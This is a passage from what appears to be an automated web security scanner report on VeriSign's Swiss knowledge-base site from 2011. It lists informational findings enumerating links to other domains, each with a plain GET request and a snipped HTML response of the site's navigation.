https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:03 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </a> <a style="margin: 5px 10px 0pt 0pt; display: block; font-weight: bold; float: left; background-image: url("/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif"); width: 75px; color: rgb(255, 255, 255); line-height: 24px; height: 24px; text-align: center; text-decoration: none;" href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP"> SEARCH</a>...[SNIP]... <li><a href="https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_self"> Report Code Signing Misuse</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://digitalid.verisign.com/client/retrieve_id.htm https://digitalid.verisign.com/services/client/index.html https://digitalid.verisign.com/services/client/renew.htm https://digitalid.verisign.com/services/client/replace.htm https://digitalid.verisign.com/services/client/revoke.htm https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </h4><a href="https://digitalid.verisign.com/services/client/renew.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> RENEW</a> <a href="https://digitalid.verisign.com/services/client/revoke.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> REVOKE</a> <a href="https://digitalid.verisign.com/services/client/replace.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> REPLACE</a> <a href="https://digitalid.verisign.com/services/client/index.html" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(255,255,255); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> SEARCH</a> <a href="https://digitalid.verisign.com/client/retrieve_id.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> RETRIEVE</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.9. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://onsite-admin.verisign.com/OnSiteHome.htm https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:54 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <br/> <a href="https://onsite-admin.verisign.com/OnSiteHome.htm"> <img src="apps/infocenter/resources/images/signin-button.gif" alt="Sign In"/>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure 